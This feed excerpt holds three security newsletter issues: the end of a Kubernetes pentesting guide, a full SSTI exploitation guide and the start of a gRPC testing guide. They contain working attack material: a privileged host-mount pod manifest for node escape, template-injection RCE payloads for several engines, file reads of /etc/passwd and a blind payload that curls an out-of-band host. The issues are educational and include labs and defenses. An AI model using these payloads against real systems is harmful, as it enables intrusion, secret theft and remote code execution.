The most interesting misconfiguration for attackers is having `pods:create` permission. If you have this, you can create a privileged pod with host access.

```bash
cat &lt;&lt;EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: privesc-pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: privesc
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
    command: [&quot;/bin/bash&quot;, &quot;-c&quot;, &quot;sleep 3600&quot;]
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
EOF
```

Then execute into it and chroot to gain root access on the underlying node:

```bash
kubectl exec -it privesc-pod -- /bin/bash
chroot /host
```

ClusterRoleBindings that grant `secrets:get` across all namespaces give you access to every credential in the cluster.

### Enumeration

Check what permissions you have:

```bash
kubectl auth can-i --list
kubectl auth can-i create pods
kubectl auth can-i get secrets --all-namespaces
```

List roles and bindings to understand the RBAC structure:

```bash
kubectl get roles,rolebindings
kubectl get clusterroles,clusterrolebindings
```

According to the [Microsoft Kubernetes Threat Matrix](https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/), the typical escalation path follows this sequence: RCE in pod, service account enumeration, steal secrets (if you have `secrets:get`), create privileged pod (if you have `pods:create`), gain node access, and finally achieve cluster admin.

## 🛠️ Essential Tools for Kubernetes Pentesting

### kubectl

[kubectl](https://kubernetes.io/docs/reference/kubectl/) is the official Kubernetes CLI. If it&apos;s already installed in the pod, you&apos;re in luck. It will use your service account token automatically.

```bash
kubectl auth can-i --list
kubectl get pods
kubectl get secrets
```

You can create a privileged pod for node access with a long one-liner using `--overrides`:

```bash
kubectl run privesc --image=ubuntu --restart=Never \
  --overrides=&apos;{&quot;spec&quot;:{&quot;hostPID&quot;:true,&quot;hostNetwork&quot;:true,&quot;containers&quot;:[{&quot;name&quot;:&quot;privesc&quot;,&quot;image&quot;:&quot;ubuntu&quot;,&quot;command&quot;:[&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;sleep 3600&quot;],&quot;securityContext&quot;:{&quot;privileged&quot;:true},&quot;volumeMounts&quot;:[{&quot;name&quot;:&quot;host&quot;,&quot;mountPath&quot;:&quot;/host&quot;}]}],&quot;volumes&quot;:[{&quot;name&quot;:&quot;host&quot;,&quot;hostPath&quot;:{&quot;path&quot;:&quot;/&quot;,&quot;type&quot;:&quot;Directory&quot;}}]}}&apos;
```

If kubectl isn&apos;t installed, you can download the static binary from the official Kubernetes release page.
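
The official docs give a one-liner for grabbing the latest stable build; pointing it at the in-cluster API server is then just flags (reusing the variables exported earlier):

```bash
curl -LO &quot;https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl&quot;
chmod +x kubectl
./kubectl --server=$APISERVER --token=$TOKEN --certificate-authority=$CACERT auth can-i --list
```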

### kubeletctl

[kubeletctl](https://github.com/cyberark/kubeletctl) by CyberArk exploits the kubelet API. The kubelet runs on each worker node (port 10250). If it&apos;s unauthenticated or weakly authenticated, you can list pods running on the node and execute commands in any pod on that node.

```bash
# Scan for kubelet API
./kubeletctl_linux_amd64 scan --cidr 10.0.0.0/24

# Execute command in a pod
./kubeletctl_linux_amd64 exec -s 10.0.1.5 -p nginx-pod -c nginx -- /bin/bash
```

### kube-hunter

[kube-hunter](https://github.com/aquasecurity/kube-hunter) by Aqua Security performs automated vulnerability scanning. It looks for open kubelet APIs, exposed dashboards, privilege escalation paths, and insecure configurations.

```bash
docker run -it --rm --network host aquasec/kube-hunter --pod
```

### peirates

[peirates](https://github.com/inguardians/peirates) is an interactive Kubernetes pentesting framework with service account enumeration, RBAC escalation, and secret stealing capabilities.

### kubectl-who-can

[kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) enumerates RBAC permissions:

```bash
kubectl who-can create pods
kubectl who-can get secrets --all-namespaces
```

## 🎓 Hands-On Labs and Practice

The best place to start is [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) by OWASP. It provides 20+ vulnerable scenarios covering RBAC, secrets, container escapes, and privilege escalation.

```bash
git clone https://github.com/madhuakula/kubernetes-goat
cd kubernetes-goat
bash setup-kubernetes-goat.sh
```

[KubeHound](https://github.com/DataDog/KubeHound) by DataDog is an attack path mapping tool similar to BloodHound but for Kubernetes. It automatically calculates attack paths between assets in a cluster using graph theory.

For CTF-style practice, HackTheBox has confirmed Kubernetes machines. [SteamCloud](https://www.hackthebox.com/machines/steamcloud) is an easy box with kubelet exploitation and service account token abuse. [Unobtainium](https://www.hackthebox.com/machines/unobtainium) is a hard box featuring Kubernetes RBAC exploitation and pod escape techniques.

Free playgrounds include [Killercoda](https://killercoda.com/) with interactive K8s labs in your browser, and [Play with Kubernetes](https://labs.play-with-k8s.com/) which provides a free 4-hour K8s cluster.

## 🎯 Wrapping Up

This newsletter covered the fundamentals of Kubernetes security from an offensive perspective. Service accounts give you automatic credentials in every pod. RBAC misconfigurations are the primary privilege escalation path. The kubelet API is often unauthenticated. And one compromised pod can lead to full cluster compromise.

What you should practice: detecting when you&apos;re in a K8s pod by checking `/var/run/secrets/kubernetes.io/serviceaccount/`, enumerating permissions with `kubectl auth can-i --list`, stealing secrets if you have `secrets:get`, creating privileged pods if you have `pods:create`, and exploiting unauthenticated kubelet APIs.

Start with Kubernetes Goat, read the NSA/CISA Kubernetes Hardening Guide, and try a HackTheBox machine with Kubernetes.

---

## 💬 New: Comments Section!

Quick announcement: I&apos;ve just added a **comments section** to all blog posts and newsletters using Giscus. You can now drop your thoughts, questions, or feedback directly below each post.

Found a bug in the site? Have a suggestion? Want to discuss Kubernetes attack paths? The comments are now live. Try it out below 👇

---

See you in the next issue 👋</content:encoded><category>Newsletter</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>Server-Side Template Injection (SSTI): Breaking Out of Templates</title><link>https://www.kayssel.com/newsletter/issue-32</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-32</guid><description>How attackers exploit template engines to achieve remote code execution by injecting malicious payloads into server-side templates</description><pubDate>Sun, 11 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Server-Side Template Injection (SSTI) is one of those vulnerabilities that goes straight from user input to remote code execution. When user input gets embedded directly into a template and processed by the template engine, attackers can break out of the intended context and execute arbitrary code. Unlike XSS where you attack the browser, SSTI attacks the server itself.

Template engines are everywhere. Flask uses Jinja2. Django has its own. Ruby on Rails uses ERB. Express.js apps often use Pug or Handlebars. PHP applications might use Twig or Smarty. Java applications use Freemarker or Velocity. All of these have been exploited via SSTI.

In this issue, we&apos;ll cover:
- How template engines work and why they&apos;re vulnerable
- Identifying template engines from error messages
- Detection techniques for different engines
- Exploitation paths from detection to RCE
- Engine-specific payloads (Jinja2, Twig, Freemarker, etc.)
- Sandbox escape techniques
- Real-world CVEs from 2024
- Tools and labs for practice

If you&apos;re pentesting web applications, understanding SSTI is critical. It&apos;s an often-overlooked vulnerability that can lead straight to remote code execution.

Let&apos;s break some templates 👇

## 🎯 Understanding Template Engines

Template engines separate presentation logic from application code. Instead of mixing HTML with backend code, developers write templates with placeholders that get replaced at runtime.

**Example template (Jinja2):**

```html
&lt;h1&gt;Welcome, {{username}}!&lt;/h1&gt;
&lt;p&gt;Your balance is ${{balance}}&lt;/p&gt;
```

**Rendered output:**

```html
&lt;h1&gt;Welcome, Alice!&lt;/h1&gt;
&lt;p&gt;Your balance is $1,234&lt;/p&gt;
```

The template engine evaluates `{{username}}` and `{{balance}}`, replacing them with actual values.

### Why Template Engines Are Dangerous

Template engines are designed to execute code. That&apos;s their job. They support:
- Variable interpolation: `{{variable}}`
- Expressions: `{{7*7}}` or `{{user.name.upper()}}`
- Filters: `{{text|escape}}` or `{{date|format(&apos;Y-m-d&apos;)}}`
- Control structures: `{% if admin %}...{% endif %}`
- Object access: `{{config.SECRET_KEY}}`

When user input flows into a template without proper sanitization, attackers can inject template directives. Since the engine executes these directives server-side, you get remote code execution.

### Safe vs. Unsafe Template Usage

**Safe (data-level injection):**

```python
# User input goes into template data, not template itself
template = &quot;Hello, {{name}}!&quot;
render(template, {&apos;name&apos;: user_input})
```

Even if `user_input` is `{{7*7}}`, it renders as literal text: &quot;Hello, {{7*7}}!&quot;

**Unsafe (template-level injection):**

```python
# User input becomes part of the template
template = &quot;Hello, &quot; + user_input + &quot;!&quot;
render(template, {})
```

If `user_input` is `{{7*7}}`, the template becomes `Hello, {{7*7}}!` and evaluates to &quot;Hello, 49!&quot;

The vulnerability occurs when developers dynamically construct templates from user input.
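
The same contrast in runnable form: a deliberately naive toy engine (a stdlib sketch, not a real template library) that evaluates whatever sits between double braces:

```python
import re

# Toy engine: evaluates whatever sits inside {{ }} with eval(),
# mimicking how a real engine evaluates expressions server-side
def render(template, data):
    return re.sub(r"\{\{(.+?)\}\}",
                  lambda m: str(eval(m.group(1), {}, data)),
                  template)

user_input = "{{7*7}}"

# Safe: input is template *data*; the braces are never re-evaluated
safe = render("Hello, {{name}}!", {"name": user_input})

# Unsafe: input is concatenated into the template *string* itself
unsafe = render("Hello, " + user_input + "!", {})

print(safe)    # Hello, {{7*7}}!
print(unsafe)  # Hello, 49!
```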

## 🔍 Detecting SSTI

### Initial Detection

Test with basic mathematical expressions:

```
{{7*7}}
${7*7}
&lt;%= 7*7 %&gt;
${{7*7}}
#{7*7}
```

If any of these render as `49`, you&apos;ve found SSTI. Different engines use different syntax:

- **`{{...}}`**: Jinja2, Twig, Handlebars, Mustache
- **`${...}`**: Freemarker, Velocity, Thymeleaf
- **`&lt;%= ... %&gt;`**: ERB (Ruby), EJS (Node.js)
- **`#{...}`**: Pug
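
James Kettle&apos;s original research also suggests a single polyglot probe that breaks most engines at once; a changed response or an error after submitting it is a strong SSTI signal:

```
${{&lt;%[%&apos;&quot;}}%\
```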

### Decision Tree for Engine Identification

Once you confirm SSTI, identify the template engine:

**Step 1: Try basic syntax variations**

```
{{7*&apos;7&apos;}}      → &apos;7777777&apos; = Jinja2 (string repetition)
{{7*&apos;7&apos;}}      → 49 = Twig (type coercion)
${7*7}         → 49 = Freemarker
#set($x=7*7)$x → 49 = Velocity
&lt;%= 7*7 %&gt;     → 49 = ERB or EJS
```

**Step 2: Distinguish between similar engines**

For Jinja2 vs. Twig:

```
{{7*&apos;7&apos;}}         → &apos;7777777&apos; (Jinja2 repeats the string), 49 (Twig coerces to numbers)
{{config}}        → Flask config object (Jinja2 under Flask), empty or error (Twig)
```

For Freemarker vs. Velocity:

```
${7*7}            → 49 (Freemarker), rendered literally (Velocity)
#set($x=7*7)$x    → 49 (Velocity)
```

**Step 3: Check error messages**

Trigger an error intentionally to leak the engine name:

```
{{undefined_variable}}
${nonexistent.function()}
&lt;%= raise &apos;test&apos; %&gt;
```

Error messages often reveal:
- Template engine name and version
- File paths (useful for later exploitation)
- Framework details (Flask, Django, Rails, etc.)

## 🧨 Exploitation by Template Engine

### Jinja2 (Python / Flask)

Jinja2 is used by Flask and other Python web frameworks. It has a sandbox, but it can be escaped.

**Basic information disclosure:**

```python
{{config}}
{{config.items()}}
{{self.__dict__}}
```

This leaks Flask configuration, including `SECRET_KEY`, database credentials, and other sensitive data.

**Sandbox escape to RCE:**

The goal is to access Python&apos;s `os` module to execute commands. Jinja2&apos;s sandbox blocks direct access, so we exploit built-in context objects.

**Reliable payloads (from HackTricks):**

```python
# Using cycler object
{{cycler.__init__.__globals__.os.popen(&apos;id&apos;).read()}}

# Using joiner object
{{joiner.__init__.__globals__.os.popen(&apos;id&apos;).read()}}

# Using namespace object
{{namespace.__init__.__globals__.os.popen(&apos;id&apos;).read()}}
```

These payloads exploit Jinja2 context objects (`cycler`, `joiner`, `namespace`) that have accessible `__init__` methods exposing `__globals__`, allowing direct access to the `os` module.
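
You can reproduce the mechanism locally without Jinja2. Every Python function keeps a reference to the globals of the module that defined it, so a stand-in class (hypothetical, stdlib only) leaks `os` the same way the real `cycler` does:

```python
import os  # imported here, so it lands in this module's globals

class Cycler:  # stand-in for Jinja2's cycler/joiner/namespace helpers
    def __init__(self):
        pass

# __init__ is a plain function; its __globals__ is the defining module's namespace
g = Cycler.__init__.__globals__
print(g["os"].popen("echo pwned").read())  # pwned
```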

**Filter bypass:**

If keywords like `class` or `import` are filtered:

```python
# Use string concatenation
{{&apos;cl&apos;+&apos;ass&apos;}}

# Use attribute access
{{request[&apos;__cl&apos;+&apos;ass__&apos;]}}

# Hex escapes (the parsed string still contains &apos;__&apos;, but the raw request doesn&apos;t)
{{request|attr(&quot;\x5f\x5fclass\x5f\x5f&quot;)}}
```

### Twig (PHP / Symfony)

Twig is the default template engine for Symfony applications.

**Basic detection:**

```php
{{7*7}}  → 49
{{7*&apos;7&apos;}} → 49 (Twig does type coercion)
```

**Information disclosure:**

```php
{{_self}}
{{_self.env}}
{{dump(app)}}
```

**RCE via filter registration:**

```php
{{_self.env.registerUndefinedFilterCallback(&quot;system&quot;)}}{{_self.env.getFilter(&quot;id&quot;)}}
```

This registers `system` as a catch-all for undefined filters, then invokes it with the `id` command. Note that the `_self.env` trick applies to Twig 1.x; in Twig 2 and later, `_self` returns the template name and this path is closed.

**Using array filter (shorter):**

```php
{{[&apos;id&apos;]|filter(&apos;system&apos;)}}
{{[&apos;cat /etc/passwd&apos;]|filter(&apos;system&apos;)}}
```

This technique chains array operations with system command execution.

### Freemarker (Java)

Freemarker is common in Java applications, especially with Spring Framework.

**Basic detection:**

```java
${7*7}  → 49
```

**RCE via `Execute` class:**

```java
&lt;#assign ex=&quot;freemarker.template.utility.Execute&quot;?new()&gt;
${ex(&quot;id&quot;)}
```

This creates a new instance of the `Execute` class and runs the `id` command.

**Shorter alternative:**

```java
${&quot;freemarker.template.utility.Execute&quot;?new()(&quot;whoami&quot;)}
```

**Reading files:**

```java
&lt;#assign file=&quot;freemarker.template.utility.FileReader&quot;?new()&gt;
${file(&quot;/etc/passwd&quot;)}
```

### Velocity (Java)

Used in older Java applications and Apache projects.

**Basic detection:**

```java
#set($x=7*7)$x  → 49  ## plain ${7*7} is not a valid VTL reference and usually renders literally
```

**RCE via reflection:**

```java
#set($x=&apos;&apos;)
#set($rt = $x.class.forName(&apos;java.lang.Runtime&apos;))
#set($ex=$rt.getRuntime().exec(&apos;id&apos;))
$ex.waitFor()
```

**With output capture:**

```java
#set($x=&apos;&apos;)
#set($rt = $x.class.forName(&apos;java.lang.Runtime&apos;))
#set($chr = $x.class.forName(&apos;java.lang.Character&apos;))
#set($str = $x.class.forName(&apos;java.lang.String&apos;))
#set($ex=$rt.getRuntime().exec(&apos;whoami&apos;))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```

### ERB (Ruby / Rails)

ERB (Embedded Ruby) is the default template engine for Ruby on Rails.

**Basic detection:**

```ruby
&lt;%= 7*7 %&gt;  → 49
```

**RCE:**

```ruby
&lt;%= system(&apos;id&apos;) %&gt;
&lt;%= `whoami` %&gt;
&lt;%= IO.popen(&apos;id&apos;).readlines() %&gt;
```

**Reading files:**

```ruby
&lt;%= File.open(&apos;/etc/passwd&apos;).read %&gt;
```

## 🛠️ Tools of the Trade

**[tplmap](https://github.com/epinna/tplmap)**: The original and most comprehensive SSTI exploitation tool. Supports 15+ template engines including Jinja2, Twig, Freemarker, Velocity, ERB, and more. Automates detection, identification, and exploitation. Written in Python 2.7.

```bash
# Install
git clone https://github.com/epinna/tplmap.git
cd tplmap

# Basic usage
python2 tplmap.py -u &apos;http://target.com/page?name=*&apos;

# With POST data
python2 tplmap.py -u &apos;http://target.com/page&apos; -d &apos;name=*&amp;email=test@test.com&apos;

# Execute an OS command once injection is confirmed
python2 tplmap.py -u &apos;http://target.com/page?name=*&apos; --os-cmd &apos;id&apos;
```

**[SSTImap](https://github.com/vladko312/SSTImap)**: Modern Python 3 alternative to tplmap with interactive interface. Automatic SSTI detection and exploitation with better maintainability.

```bash
# Install
git clone https://github.com/vladko312/SSTImap.git
cd SSTImap

# Basic usage
python3 sstimap.py -u &apos;http://target.com/page?name=*&apos;

# Interactive mode
python3 sstimap.py -i -u &apos;http://target.com/page?name=*&apos;
```

**[PayloadsAllTheThings - SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)**: Comprehensive payload collection for all major template engines. Includes detection payloads, exploitation chains, and bypass techniques. Essential reference during pentests.

**[Burp Suite Collaborator](https://portswigger.net/burp/documentation/collaborator)**: Useful for blind SSTI detection. Inject payloads that trigger DNS or HTTP requests to your Collaborator domain:

```python
# Jinja2 blind SSTI
{{config.__class__.__init__.__globals__[&apos;os&apos;].popen(&apos;curl http://YOUR_COLLABORATOR.burpcollaborator.net&apos;).read()}}
```

## 🧪 Labs &amp; Practice

**[PortSwigger Web Security Academy](https://portswigger.net/web-security/server-side-template-injection)**:

- [Basic server-side template injection](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic): Delete a file using ERB template injection
- [Basic server-side template injection (code context)](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context): Exploit Tornado template in code context
- [Server-side template injection using documentation](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation): Identify template engine and exploit using documentation
- [Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit): Find and use public exploits
- [Server-side template injection with information disclosure via user-supplied objects](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-with-information-disclosure-via-user-supplied-objects): Exploit object access to leak secret keys

**HackTheBox**:

- **[Spider](https://app.hackthebox.com/machines/Spider)**: Hard-rated retired Linux machine with Jinja2 SSTI exploitation featuring character length limitations and filter bypasses
- **[Late](https://app.hackthebox.com/machines/Late)**: Easy-rated machine with SSTI vulnerability in text reading application leading to RCE
- **[Doctor](https://app.hackthebox.com/machines/Doctor)**: Medium-rated machine exploitable via SSTI
- **Neonify** (Challenge): ERB (Ruby) SSTI with regex filter bypass
- **HTB Academy - Server-side Attacks Course**: Dedicated module covering SSTI identification and exploitation

**TryHackMe**:

Search for &quot;Server Side Template Injection&quot; or &quot;SSTI&quot; on the platform for dedicated rooms covering exploitation techniques and hands-on practice

## 🔒 Defense &amp; Mitigation

**For Developers:**

**1. Never use user input to construct templates**

```python
# BAD - User input in template string
template = &quot;Hello, &quot; + user_name + &quot;!&quot;
render(template)

# GOOD - User input in template data
template = &quot;Hello, {{name}}!&quot;
render(template, {&apos;name&apos;: user_name})
```

**2. Use sandboxed template engines**

Enable sandboxing where available:

```python
# Jinja2 with sandbox
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
```

**3. Implement strict allow-lists for template features**

Disable unnecessary template features:

```python
# Disable dangerous filters and functions
env = Environment(
    autoescape=True,
    extensions=[],  # No extensions
)
```

**4. Use logic-less template engines**

Consider using engines that don&apos;t support code execution:

- Mustache (logic-less by design)
- Handlebars (limited logic)

**5. Apply Content Security Policy (CSP)**

While CSP won&apos;t stop SSTI, it can limit post-exploitation impact by preventing data exfiltration or callback to attacker infrastructure.

**For Pentesters:**

- Test all user-controllable input that appears in rendered output
- Check for SSTI in less obvious places: HTTP headers, file uploads (especially filenames), API parameters
- Try multiple syntax variations to identify the engine
- Use Burp Collaborator for blind SSTI detection
- Don&apos;t stop at information disclosure. Always attempt RCE
- Check for filter bypasses if basic payloads fail

## 🎯 Key Takeaways

- **SSTI occurs when user input is embedded directly into template code** rather than template data
- **Template engines are designed to execute code**, making SSTI particularly dangerous
- **Detection is straightforward** using mathematical expressions like `{{7*7}}`
- **Engine identification is critical** since exploitation techniques vary significantly
- **Sandbox escapes are possible** in most template engines through object introspection
- **RCE is the end goal** but information disclosure (config, secrets) is also valuable
- **Prevention requires strict separation** between template structure and user data
- **Multiple 2024 CVEs demonstrate** this remains an active threat in modern applications

## 📚 Further Reading

- **[PortSwigger - Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)**: Comprehensive guide with interactive labs
- **[PortSwigger Research - Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection)**: Original 2015 research by James Kettle
- **[HackTricks - SSTI](https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html)**: Extensive SSTI reference with payloads for all major engines
- **[PayloadsAllTheThings - SSTI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)**: Community-maintained payload collection
- **[OWASP - Server-Side Template Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection)**: OWASP testing guide for SSTI
- **[Flask Documentation - Templates](https://flask.palletsprojects.com/en/stable/templating/)**: Official Jinja2/Flask template documentation
- **[NVD - CVE Database](https://nvd.nist.gov/)**: National Vulnerability Database for CVE details

---

That&apos;s it for this week!

SSTI is one of those vulnerabilities that feels like finding a skeleton key. When you discover it, you often go straight from limited user input to full server compromise. No privilege escalation needed. No lateral movement. Just inject a payload and you&apos;re executing code as the application user.

The key is recognizing the opportunity. When you see template syntax in user-controllable fields, test for evaluation. When you find mathematical expressions rendering as calculated values, dig deeper. And when you identify the template engine, consult the documentation and payload collections to build your exploit chain.

Start with the PortSwigger labs. They&apos;re excellent for understanding the fundamentals. Then move to HackTheBox machines where SSTI is one step in a larger attack chain. Practice identifying engines from error messages. Build muscle memory for common exploitation patterns.

See you in the next issue 🔥

Thanks for reading, and happy hacking!

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>gRPC Security: Breaking the High-Performance RPC Protocol</title><link>https://www.kayssel.com/newsletter/issue-31</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-31</guid><description>A practical guide to gRPC security testing covering service enumeration, metadata exploitation, authentication bypass, and protobuf manipulation</description><pubDate>Sun, 04 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone, and happy new year!

Hope you all had a good start to 2026. A few months back, I had an assessment that involved testing a distributed system built with gRPC. I&apos;d seen gRPC mentioned in microservice architectures before, but had never really worked with it hands-on.

Here&apos;s what I walked into. The client had multiple services communicating via gRPC. Traditional web app testing techniques didn&apos;t apply. Burp couldn&apos;t properly intercept the traffic out of the box. Directory fuzzing was useless. The service didn&apos;t return HTML or JSON, just binary data I couldn&apos;t make sense of at first.

I knew gRPC used Protocol Buffers (protobuf) for serialization and HTTP/2 for transport. But understanding the theory and actually working with it are two different things. I spent time figuring out basic enumeration. How do you discover available methods? How do you call them? What does authentication look like in gRPC?

After going through the learning curve and working with the tools, I got a much better understanding of how gRPC works from a security perspective. That&apos;s why I wanted to share what I learned with you. gRPC is everywhere in modern backend infrastructure. Kubernetes uses it. Microservices love it. Cloud-native apps depend on it. And security testing for gRPC requires a different approach than REST APIs.

In this issue, I&apos;ll cover the basics of what gRPC is and why it matters for security testing. We&apos;ll go through service discovery and enumeration techniques. You&apos;ll learn how to intercept and work with gRPC traffic, common security issues to look for, and the tools that make testing gRPC more approachable. We&apos;ll wrap up with hands-on labs you can use to practice.

If you&apos;ve been curious about gRPC but found it intimidating, this is your starting point.

Let&apos;s dive into gRPC 👇

## 🔍 What is gRPC and Why It Matters

gRPC is a Remote Procedure Call (RPC) framework developed by Google. Think of it as a way for services to call functions on other services as if they were local, except those services might be running on different machines, in different data centers, across the internet.

**Why companies use gRPC:**

It&apos;s fast. Protocol Buffers (protobuf) serialize data more efficiently than JSON. Binary encoding means smaller payloads and faster parsing. HTTP/2 multiplexing allows multiple requests over a single connection without blocking.

It&apos;s strongly typed. You define your API using `.proto` files (protobuf schemas). These schemas specify exactly what data types each method accepts and returns. No guessing, no surprises. Client and server code gets generated automatically from these schemas.

It supports bidirectional streaming. Not just request-response like REST. You can have server streaming (one request, multiple responses), client streaming (multiple requests, one response), or full bidirectional streaming. Perfect for real-time data, chat systems, or monitoring dashboards.
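
The efficiency claim is easy to verify by hand. Below is a minimal sketch of protobuf&apos;s varint wire format (assuming a proto3 message whose field 1 is an int32):

```python
# Varints store 7 bits per byte; a set high bit means more bytes follow.
def varint(n):
    out = bytearray()
    while True:
        low = n % 128
        n //= 128
        if n:
            out.append(low + 128)  # continuation bit set
        else:
            out.append(low)
            return bytes(out)

def encode_field(field_no, value):
    tag = field_no * 8  # wire type 0 (varint) in the low 3 bits
    return varint(tag) + varint(value)

# A request like { user_id: 150 } on the wire:
msg = encode_field(1, 150)
print(msg.hex())  # 089601 -- 3 bytes, vs 15 bytes for the equivalent JSON
```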

**Why this matters for pentesters:**

Traditional web app tools don&apos;t work out of the box. Burp Suite sees gRPC traffic as binary HTTP/2 data. You can&apos;t just click &quot;Intercept&quot; and read the request like you would with JSON. Directory brute-forcing doesn&apos;t help because gRPC doesn&apos;t use URL paths the way REST does.

Authentication and authorization work differently. Many gRPC services use metadata (HTTP/2 headers) for auth tokens instead of cookies or Authorization headers. Access controls are often method-level, not route-level. Misconfigurations are common.

The attack surface is different. You&apos;re looking at reflection endpoints, metadata manipulation, protobuf deserialization issues, and method-level access controls. Error messages leak service structure. Streaming endpoints can be abused for DoS. And many developers assume gRPC is &quot;internal only&quot; so they skip security controls.

**gRPC Architecture Basics:**

```
Client                          Server
  |                               |
  | 1. Define API (.proto file)   |
  |------------------------------&gt;|
  |                               |
  | 2. Generate code (protoc)     |
  |                               |
  | 3. Call remote method         |
  |------------------------------&gt;|
  |   (binary protobuf over HTTP/2)
  |                               |
  | 4. Response (binary protobuf) |
  |&lt;------------------------------|
```

**Key components:**

**Protocol Buffers (.proto files)**: Define the API contract. Specify services, methods (RPCs), and message types.

**HTTP/2**: Transport layer. All gRPC uses HTTP/2, which means multiplexing, header compression, and binary framing.

**Metadata**: Key-value pairs sent with requests (like HTTP headers). Used for authentication, tracing, authorization.

**Service Definition**: Methods exposed by the server. Each method has input and output message types.

## 🕵️ Enumerating gRPC Services

First problem: how do you even know what methods are available?

With REST APIs, you might have OpenAPI/Swagger docs, or you can brute-force paths. With gRPC, there&apos;s no standard documentation endpoint. But there&apos;s something better: **reflection**.

### gRPC Reflection

Many gRPC servers enable reflection for development and debugging. Reflection is an API that lets you query the server for available services and methods. It&apos;s like asking the server &quot;what can you do?&quot; and getting a full list back.

**Check if reflection is enabled:**

```bash
# Using grpcurl (we&apos;ll install this in a moment)
grpcurl -plaintext target.com:50051 list
```

If reflection is enabled, you&apos;ll see output like:

```
grpc.health.v1.Health
grpc.reflection.v1alpha.ServerReflection
myapp.UserService
myapp.PaymentService
```

**List methods for a service:**

```bash
grpcurl -plaintext target.com:50051 list myapp.UserService
```

Output:

```
myapp.UserService.GetUser
myapp.UserService.CreateUser
myapp.UserService.DeleteUser
myapp.UserService.UpdateUser
```

**Describe a method:**

```bash
grpcurl -plaintext target.com:50051 describe myapp.UserService.GetUser
```

Output shows the protobuf definition:

```protobuf
myapp.UserService.GetUser is a method:
rpc GetUser ( .myapp.GetUserRequest ) returns ( .myapp.User );
```

**Describe message types:**

```bash
grpcurl -plaintext target.com:50051 describe myapp.GetUserRequest
```

Output:

```protobuf
myapp.GetUserRequest is a message:
message GetUserRequest {
  int32 user_id = 1;
}
```

Now you know exactly what data to send.
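
With the method and message shape known, calling it is one grpcurl command (the field value is an example):

```bash
grpcurl -plaintext -d &apos;{&quot;user_id&quot;: 1}&apos; target.com:50051 myapp.UserService.GetUser
```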

### When Reflection is Disabled

If reflection is off, you need the `.proto` files to know what methods exist.

**Where to find .proto files:**

**GitHub/GitLab**: Search the client&apos;s public repos for `.proto` files. Many companies accidentally commit these.

**Client-side code**: Mobile apps, web clients, or SDK packages often bundle .proto files or generated code.

**Documentation**: Internal wikis, API docs, or developer portals sometimes leak protobuf definitions.

**Decompiled clients**: If you have a compiled client (Go binary, Java JAR), decompile it and extract embedded protobuf schemas.

**Guessing/Fuzzing**: If you know common method names (GetUser, ListItems, CreateOrder), you can try calling them. gRPC error messages will tell you if the method exists but you sent wrong data.
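A small generator makes that guessing systematic. The wordlists and the `myapp.UserService` target below are illustrative assumptions; seed them with anything recovered from client code or docs:

```python
from itertools import product

# Illustrative wordlists -- extend with names gleaned from the client
VERBS = ["Get", "List", "Create", "Update", "Delete"]
RESOURCES = ["User", "Users", "Order", "Item", "Account"]

def candidate_methods(package: str, service: str) -> list:
    """Build fully-qualified gRPC method names to try one by one."""
    return [f"{package}.{service}.{verb}{noun}"
            for verb, noun in product(VERBS, RESOURCES)]

candidates = candidate_methods("myapp", "UserService")
print(candidates[0])    # myapp.UserService.GetUser
print(len(candidates))  # 25
```

Feed each candidate to a grpcurl call: an `Unimplemented` status means the method does not exist, while a different error (say, `InvalidArgument`) confirms it does.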

**Example of extracting from a Go binary:**

```bash
# Go embeds protobuf descriptors in binaries
strings client_binary | grep -i &quot;\.proto&quot;

# Use protoc --decode to reverse-engineer messages from captured traffic
```

### Port and Service Discovery

gRPC commonly runs on:
- **50051** (default gRPC port)
- **443** (HTTPS, especially in production)
- **8080, 8443, 9090** (common custom ports)

**Scan for gRPC services:**

```bash
# Nmap service detection; the tls-alpn script reveals HTTP/2 (h2) support on TLS ports
nmap -p 50051,443,8080,8443,9090 -sV --script tls-alpn target.com

# Check TLS/non-TLS
grpcurl -plaintext target.com:50051 list  # Non-TLS
grpcurl target.com:443 list                # TLS
```

## 🔓 Common gRPC Vulnerabilities

### 1. Insecure Reflection in Production

Reflection should be disabled in production environments. It exposes your entire API surface. However, developers sometimes forget to turn it off.

**Impact**: Full service enumeration becomes possible. Anyone can discover every method, every parameter, every message type. Use the enumeration techniques covered earlier to map the attack surface.

### 2. Missing Authentication/Authorization

Some methods require authentication, others don&apos;t. Developers sometimes assume gRPC is &quot;internal only&quot; and skip authentication entirely.

